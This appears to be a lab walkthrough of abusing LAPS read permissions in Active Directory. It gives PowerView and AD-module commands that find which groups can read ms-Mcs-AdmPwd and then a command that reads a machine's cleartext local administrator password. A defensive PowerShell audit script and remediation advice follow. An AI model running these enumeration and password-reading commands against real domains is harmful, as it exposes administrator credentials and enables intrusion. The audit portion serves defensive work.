LAPS (Local Administrator Password Solution) stores the local administrator passwords of domain-joined machines in Active Directory. The abuse arises when a normal user has permission to read the attribute that stores the local admin password (ms-Mcs-AdmPwd).

Now let's use PowerView to enumerate LAPS read permissions:

Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs |
    Where-Object { ($_.ObjectAceType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty') } |
    ForEach-Object { $_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier); $_ }

As observed, the StudentUsers group can read the attribute ms-Mcs-AdmPwd (the attribute that stores the local admin password in clear text) on the machine MailMgmt.

Enumerating LAPS Permissions using the AD Module and the Get-LAPSPermissions Script

Loading the AD module:

Import-Module ./Microsoft.ActiveDirectory.Management.dll
Import-Module ./ActiveDirectory.psd1

Now let's run the Get-LAPSPermissions script:

.\Get-LAPSPermissions.ps1

As observed, the script confirms the same finding: StudentUsers can read the attribute ms-Mcs-AdmPwd (the attribute that stores the local admin password in clear text) on the machine MailMgmt.

Now let's read the password from the ms-Mcs-AdmPwd attribute:

Get-DomainComputer | Where-Object samaccountname -match mailmgmt | select samaccountname, ms-Mcs-AdmPwd
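To find a delegation like the StudentUsers one before an attacker does, here is an added audit script written from the defender's side; it is not from the original post and is not the Get-LAPSPermissions script used above. It resolves the ms-Mcs-AdmPwd schema GUID from the forest at runtime, then lists, per computer object, every principal outside an expected set that holds a right covering that attribute, and shows whether the grant is inherited from a parent OU. Assumed: the RSAT ActiveDirectory module is installed, and the $expectedHolders list matches your delegation model.

```powershell
# Added audit example, not code from the original post. Assumes the RSAT ActiveDirectory
# module and that the caller can read object DACLs (any domain user can, which is why an
# over-broad delegation is easy to miss). $expectedHolders is an assumption; adjust it.
Import-Module ActiveDirectory

# ms-Mcs-AdmPwd has no well-known GUID: resolve its schemaIDGUID from this forest's schema.
$schemaNC = (Get-ADRootDSE).schemaNamingContext
$attrObj  = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(lDAPDisplayName=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
if (-not $attrObj) { throw 'ms-Mcs-AdmPwd not found in the schema; legacy LAPS is not deployed.' }
$admPwdGuid = [guid]$attrObj.schemaIDGUID
$allGuid    = [guid]::Empty   # ACE not scoped to one attribute: applies to all attributes/rights

$expectedHolders = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', "$env:USERDOMAIN\Domain Admins")

function Get-LapsReadFindings {
    foreach ($computer in Get-ADComputer -Filter *) {
        $acl = Get-Acl -Path ("AD:\" + $computer.DistinguishedName)
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($ace.ObjectType -ne $admPwdGuid -and $ace.ObjectType -ne $allGuid) { continue }
            $who = $ace.IdentityReference.Value
            if ($expectedHolders -contains $who) { continue }
            $r = $ace.ActiveDirectoryRights
            # ms-Mcs-AdmPwd is a confidential attribute: reading it needs ReadProperty plus the
            # control-access (ExtendedRight) right, or GenericAll. ReadProperty scoped to the
            # attribute itself is reported for review; the default "read all properties" ACEs
            # that every computer object carries (ObjectType = Empty) are skipped as noise.
            if ($r.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericAll) -or
                $r.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight)) {
                $sev = 'HIGH: can read password'
            } elseif ($ace.ObjectType -eq $admPwdGuid -and
                      $r.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ReadProperty)) {
                $sev = 'REVIEW: ReadProperty on ms-Mcs-AdmPwd'
            } else { continue }
            [pscustomobject]@{
                Computer  = $computer.Name
                Principal = $who
                Severity  = $sev
                Rights    = $r.ToString()
                Inherited = $ace.IsInherited   # True: the grant lives on a parent OU, fix it there
            }
        }
    }
}

Get-LapsReadFindings | Sort-Object Severity, Principal, Computer | Format-Table -AutoSize
```

Remediation is to remove the unexpected ACE on the OU it is inherited from rather than on each computer. Windows LAPS stores its password in msLAPS-Password rather than ms-Mcs-AdmPwd, so this script covers only the legacy LAPS attribute discussed in this post.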